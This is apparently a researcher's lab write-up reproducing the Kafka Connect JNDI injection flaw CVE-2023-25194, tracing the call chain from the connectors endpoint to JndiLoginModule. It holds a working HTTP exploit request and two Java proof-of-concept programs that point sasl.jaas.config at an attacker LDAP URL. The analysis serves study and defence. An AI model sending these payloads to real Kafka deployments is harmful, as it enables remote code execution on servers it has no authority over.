Kafka JNDI Injection Vulnerability Analysis

​ I've been hooked on JNDI injection lately, and after seeing that Kafka once had a JNDI injection vulnerability, I reproduced it as a learning exercise. First, a quick introduction to Kafka: the project's goal is to provide a unified, high-throughput, low-latency platform for handling real-time data feeds. It is written in Scala and Java. In short, it is a distributed message queue, commonly used to buffer data. The vulnerability reproduced here is CVE-2023-25194, affecting versions 2.4.0 <= Apache Kafka <= 3.3.2.

​ Just grab the archive provided in the Yuque write-up (see references) and start everything directly:

./bin/zookeeper-server-start.sh ./config/zookeeper.properties
./bin/kafka-server-start.sh ./config/server.properties
./bin/connect-standalone.sh ./config/connect-standalone.properties ./config/connect-file-source.properties ./config/connect-file-sink.properties

Visit http://127.0.0.1:8083/connector-plugins on your own machine; if the response lists the expected connector plugins, the environment is ready.
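
If you prefer to script that check, here is a minimal sketch using java.net.http (Java 11+); the class name is mine, and the URL is the default Connect REST endpoint from above:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class PluginCheck {
    public static void main(String[] args) throws Exception {
        // GET the installed connector plugins from the Connect REST API;
        // the Debezium MySQL connector should appear in the response.
        HttpRequest req = HttpRequest.newBuilder(
                URI.create("http://127.0.0.1:8083/connector-plugins"))
                .GET().build();
        HttpResponse<String> resp = HttpClient.newHttpClient()
                .send(req, HttpResponse.BodyHandlers.ofString());
        System.out.println(resp.body());
    }
}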


Sending the PoC below pops a calculator; database.password must be filled in with your own database password.

POST /connectors HTTP/1.1
Host: 127.0.0.1:8083
Content-Type: application/json
Content-Length: 811

{
    "name": "debezium-test-50174",
    "config": {
        "connector.class": "io.debezium.connector.mysql.MySqlConnector",
        "database.hostname": "127.0.0.1",
        "database.port": "3306",
        "database.user": "root",
        "database.password": "Admin@123",
        "database.server.id": "316545017",
        "database.server.name": "test1",
        "database.history.kafka.bootstrap.servers": "127.0.0.1:9092",
        "database.history.kafka.topic": "quickstart-events",    "database.history.producer.security.protocol": "SASL_SSL",
        "database.history.producer.sasl.mechanism": "PLAIN",
        "database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://127.0.0.1:1389/xmzgie\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
    }
}
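
For reference, the database.history.producer.* entries above end up as the history producer's client config. Below is a minimal sketch of my own (not from the original article) that triggers the same chain locally by constructing a KafkaProducer with the malicious sasl.jaas.config directly, assuming a vulnerable kafka-clients jar (2.4.0–3.3.2) on the classpath and an attacker-controlled LDAP server at the PoC address:

import java.util.Properties;
import org.apache.kafka.clients.producer.KafkaProducer;

public class ProducerJndiPoc {
    public static void main(String[] args) {
        Properties props = new Properties();
        props.put("bootstrap.servers", "127.0.0.1:9092");
        props.put("key.serializer",
                "org.apache.kafka.common.serialization.StringSerializer");
        props.put("value.serializer",
                "org.apache.kafka.common.serialization.StringSerializer");
        // These three security properties mirror the
        // database.history.producer.* entries in the PoC.
        props.put("security.protocol", "SASL_SSL");
        props.put("sasl.mechanism", "PLAIN");
        props.put("sasl.jaas.config",
                "com.sun.security.auth.module.JndiLoginModule required "
                + "user.provider.url=\"ldap://127.0.0.1:1389/xmzgie\" "
                + "useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" "
                + "group.provider.url=\"xxx\";");
        // Constructing the producer is enough: the constructor walks
        // newSender -> createChannelBuilder -> ... -> JndiLoginModule#login,
        // as traced below, performing the JNDI lookup before any broker I/O.
        new KafkaProducer<String, String>(props).close();
    }
}

Running it should produce the same LDAP callback as the Connect PoC, without the REST layer.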

​ This analysis draws on 4rain's article, which notes that the connector endpoint is merely the entry point, not the root cause of the vulnerability. But in the spirit of getting to the bottom of things, and as a test for myself, I still started the analysis from the HTTP request.

​ Code auditing calls for dynamic debugging, so the first step is enabling debug mode. Three Java programs need to run, and debugging should be switched on when launching the last one. I opened the directory in VS Code and located bin/kafka-run-class.sh; its original content is shown below.


After running these two commands:

./bin/zookeeper-server-start.sh ./config/zookeeper.properties
./bin/kafka-server-start.sh ./config/server.properties

add export KAFKA_DEBUG=2 at the top of the file (any non-empty value enables the JDWP agent).


Re-running the connect-standalone command will then open a debug listener on port 5005.

Next, create an empty project in IDEA.

In the new project, locate the libs directory of the Kafka installation you are running and import all of its jar files as dependencies.

Creating the Remote JVM debug configuration is covered in the reference links, so I won't repeat it here.

​ So how do we find the program's entry point? I came up with two approaches:

  • The HTTP request goes to the /connectors endpoint, so search the whole codebase for connectors.

  • The vulnerability triggers while a new Connector is being created; in testing, re-sending the same request returns Connector debezium-test-50150 already exists.

    • already exists is therefore a keyword signature; a global search for it turned up AlreadyExistsException.class.


Set a breakpoint and see: it does break there. Scrolling up the call stack, ConnectorsResource#createConnector exactly matches the method we are looking for, so the program entry point is located. (PS: it is best not to click "Download Sources" in IDEA — that can leave the bytecode and source code mismatched, which makes the debugging flow very confusing.)


Debugging down from ConnectorsResource#createConnector, I could never reach the JNDI injection point. Anyone familiar with Kafka's internals will know it is multi-threaded: the thread handling our HTTP request never runs straight through to the JNDI injection. The HTTP request merely schedules a new task on a thread pool, and the actual JNDI injection happens on a different thread (I believe that is right... corrections welcome from the experts, this was genuinely hard). The payload asks to create a connector of class io.debezium.connector.mysql.MySqlConnector, and according to an article on writing custom Kafka connectors, a SourceConnector's tasks should extend SourceTask — see the sketch below.
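
To illustrate the shape of that API, here is a minimal skeleton of my own (hypothetical, not Debezium code): the Connect worker instantiates the task on its own worker thread and calls start() with the connector configuration, which is why the sink is unreachable from createConnector's thread:

import java.util.List;
import java.util.Map;
import org.apache.kafka.connect.source.SourceRecord;
import org.apache.kafka.connect.source.SourceTask;

// Hypothetical minimal source task, for illustration only.
public class DemoSourceTask extends SourceTask {
    @Override
    public String version() { return "1.0"; }

    @Override
    public void start(Map<String, String> props) {
        // The worker thread calls this with the connector config.
        // Debezium's BaseSourceTask overrides it and, for MySqlConnector,
        // eventually constructs the KafkaProducer analyzed below.
    }

    @Override
    public List<SourceRecord> poll() throws InterruptedException {
        return null; // no records in this skeleton
    }

    @Override
    public void stop() { }
}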


Sure enough, the io.debezium.connector.common package contains the BaseSourceTask class, and it has a start() method.


A breakpoint here does get hit — we have finally found the entry to the JNDI injection. At the end of BaseSourceTask#start, execution reaches this.coordinator = this.start(config);, where this is a MySqlConnectorTask,


so we step into MySqlConnectorTask#start.


This method contains the line:

public ChangeEventSourceCoordinator start(Configuration config) {
    // code
    this.schema = new MySqlDatabaseSchema(connectorConfig, valueConverters, topicSelector, schemaNameAdjuster, tableIdCaseInsensitive);
    // step into this constructor
    // code
}

The MySqlDatabaseSchema constructor calls the parent class constructor via super:

public MySqlDatabaseSchema(MySqlConnectorConfig connectorConfig, MySqlValueConverters valueConverter, TopicSelector<TableId> topicSelector, SchemaNameAdjuster schemaNameAdjuster, boolean tableIdCaseInsensitive) {
    super(connectorConfig, topicSelector, connectorConfig.getTableFilters().dataCollectionFilter(), connectorConfig.getColumnFilter(), new TableSchemaBuilder(valueConverter, schemaNameAdjuster, connectorConfig.customConverterRegistry(), connectorConfig.getSourceInfoStructMaker().schema(), connectorConfig.getSanitizeFieldNames()), tableIdCaseInsensitive, connectorConfig.getKeyMapper());
    this.ddlParser = new MySqlAntlrDdlParser(valueConverter, this.getTableFilter());
    this.ddlChanges = this.ddlParser.getDdlChanges();
    this.filters = connectorConfig.getTableFilters();
}

The parent class HistorizedRelationalDatabaseSchema's constructor looks like this:

protected HistorizedRelationalDatabaseSchema(HistorizedRelationalDatabaseConnectorConfig config, TopicSelector<TableId> topicSelector, Tables.TableFilter tableFilter, Tables.ColumnNameFilter columnFilter, TableSchemaBuilder schemaBuilder, boolean tableIdCaseInsensitive, Key.KeyMapper customKeysMapper) {
    super(config, topicSelector, tableFilter, columnFilter, schemaBuilder, tableIdCaseInsensitive, customKeysMapper);
    this.databaseHistory = config.getDatabaseHistory();
    this.databaseHistory.start(); // step into this call
}

This leads into KafkaDatabaseHistory#start.


KafkaDatabaseHistory#start is:

public synchronized void start() {
    super.start();
    if (this.producer == null) {
        // step into new KafkaProducer
        this.producer = new KafkaProducer(this.producerConfig.asProperties());
    }
}

The KafkaProducer(Properties) constructor:

public KafkaProducer(Properties properties) {
    this(propsToMap(properties), (Serializer)null, (Serializer)null, (ProducerMetadata)null, (KafkaClient)null, (ProducerInterceptors)null, Time.SYSTEM);
}

It delegates via this(); keep following:

KafkaProducer(Map<String, Object> configs, Serializer<K> keySerializer, Serializer<V> valueSerializer, ProducerMetadata metadata, KafkaClient kafkaClient, ProducerInterceptors interceptors, Time time) {
    // code
    // step into this method
    this.sender = this.newSender(logContext, kafkaClient, this.metadata);
    // code
}

The newSender() method:

Sender newSender(LogContext logContext, KafkaClient kafkaClient, ProducerMetadata metadata) {
    // code
    ChannelBuilder channelBuilder = ClientUtils.createChannelBuilder(this.producerConfig, this.time);
    // code
}

Step into createChannelBuilder():

public static ChannelBuilder createChannelBuilder(AbstractConfig config, Time time) {
    //code
    return ChannelBuilders.clientChannelBuilder(securityProtocol, Type.CLIENT, config, (ListenerName)null, clientSaslMechanism, time, true);
}

clientChannelBuilder()

public static ChannelBuilder clientChannelBuilder(SecurityProtocol securityProtocol, JaasContext.Type contextType, AbstractConfig config, ListenerName listenerName, String clientSaslMechanism, Time time, boolean saslHandshakeRequestEnable) {
    //code
    return create(securityProtocol, Mode.CLIENT, contextType, config, listenerName, false, clientSaslMechanism, saslHandshakeRequestEnable, (CredentialCache)null, (DelegationTokenCache)null, time);
}

create()

private static ChannelBuilder create(SecurityProtocol securityProtocol, Mode mode, JaasContext.Type contextType, AbstractConfig config, ListenerName listenerName, boolean isInterBrokerListener, String clientSaslMechanism, boolean saslHandshakeRequestEnable, CredentialCache credentialCache, DelegationTokenCache tokenCache, Time time) {
    //code
    ((ChannelBuilder)channelBuilder).configure(configs);
    return (ChannelBuilder)channelBuilder;
}

Step into configure():

public void configure(Map<String, ?> configs) throws KafkaException {
   //code
   LoginManager loginManager = LoginManager.acquireLoginManager((JaasContext)entry.getValue(), mechanism, defaultLoginClass, configs);
   //code
}

acquireLoginManager()

public static LoginManager acquireLoginManager(JaasContext jaasContext, String saslMechanism, Class<? extends Login> defaultLoginClass, Map<String, ?> configs) throws LoginException {
    //code
    loginManager = new LoginManager(jaasContext, saslMechanism, configs, loginMetadata);
    //code
}

Step into the LoginManager constructor:

private LoginManager(JaasContext jaasContext, String saslMechanism, Map<String, ?> configs, LoginMetadata<?> loginMetadata) throws LoginException {
    //code
    this.login.login();
}

Step into login():

public LoginContext login() throws LoginException {
    //code
    this.loginContext.login();
    log.info("Successfully logged in.");
    return this.loginContext;
}

Continue into LoginContext#login:

public void login() throws LoginException {
    // code
    invokePriv(LOGIN_METHOD);
    // code
}

In LoginContext#invokePriv, execution enters invoke(methodName), where methodName at this point is login:

private void invokePriv(final String methodName) throws LoginException {
    try {
        java.security.AccessController.doPrivileged
            (new java.security.PrivilegedExceptionAction<Void>() {
            public Void run() throws LoginException {
                invoke(methodName);
                return null;
            }
        }, creatorAcc);
    } catch (java.security.PrivilegedActionException pae) {
        throw (LoginException)pae.getException();
    }
}

This brings us to LoginContext#invoke, which is somewhat more involved; the code is too long, so only a screenshot was included. The key statement executed here is methods[mIndex].invoke(moduleStack[i].module, initArgs);


That is effectively a call to JndiLoginModule#initialize, with the options in moduleStack[i].module carrying user.provider.url. Back in LoginContext#invoke, execution then reaches:

boolean status = ((Boolean)methods[mIndex].invoke
                (moduleStack[i].module, args)).booleanValue();

which is effectively a call to JndiLoginModule#login.


The login method:

public boolean login() throws LoginException {
    // code
    attemptAuthentication(false);
    // code
}

Finally, the vulnerability's trigger point lives in JndiLoginModule#attemptAuthentication, which performs a JNDI lookup on the attacker-controlled user.provider.url.
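
To exercise the sink in isolation, here is a standalone sketch of my own that bypasses Kafka entirely: LoginContext#login drives JndiLoginModule through initialize() and login() by reflection, and attemptAuthentication then looks up user.provider.url (an LDAP server is assumed to be listening at the PoC address):

import java.util.HashMap;
import java.util.Map;
import javax.security.auth.login.AppConfigurationEntry;
import javax.security.auth.login.Configuration;
import javax.security.auth.login.LoginContext;

public class JaasJndiDemo {
    public static void main(String[] args) throws Exception {
        Map<String, Object> options = new HashMap<>();
        // Same module options as the sasl.jaas.config in the PoC.
        options.put("user.provider.url", "ldap://127.0.0.1:1389/xmzgie");
        options.put("useFirstPass", "true");
        options.put("debug", "true");

        Configuration conf = new Configuration() {
            @Override
            public AppConfigurationEntry[] getAppConfigurationEntry(String name) {
                return new AppConfigurationEntry[] {
                    new AppConfigurationEntry(
                        "com.sun.security.auth.module.JndiLoginModule",
                        AppConfigurationEntry.LoginModuleControlFlag.REQUIRED,
                        options)
                };
            }
        };
        // login() -> invokePriv("login") -> invoke -> JndiLoginModule#login
        // -> attemptAuthentication -> JNDI lookup of user.provider.url
        new LoginContext("demo", null, null, conf).login();
    }
}

Note that on recent JDKs remote class loading over LDAP is disabled by default, so turning the lookup into code execution additionally depends on local deserialization gadgets; the outbound LDAP request itself is still observable.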

Finally, a screenshot of the call stack.

​ I'd like to try finding this call chain with CodeQL, but haven't attempted it yet — it looks really hard; feels like it will take some serious leveling-up.

References:

https://www.cnblogs.com/hetianlab/p/17247734.html

https://www.yuque.com/yuqueyonghukcxcby/wwdc80/yntiuyx4a6gnpn1z

https://xz.aliyun.com/t/12602

https://blog.snert.cn/index.php/2023/04/04/cve-2023-25194-kafka-jndi-injection-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

https://xie.infoq.cn/article/ece8077adf7f6e8aaca047da9

https://segmentfault.com/a/1190000040790524

https://blog.csdn.net/daijiguo/article/details/108754054

http://www.m6000.cn/2061.html

https://blog.csdn.net/feeling890712/article/details/117659285

https://code-monkey.top/2020/03/10/Kafka-Connect%E7%AE%80%E4%BB%8B%E4%B8%8E%E9%83%A8%E7%BD%B2/

http://lihuaxi.xjx100.cn/news/1352399.html?action=onClick

https://articles.zsxq.com/id_52tr00657v3l.html

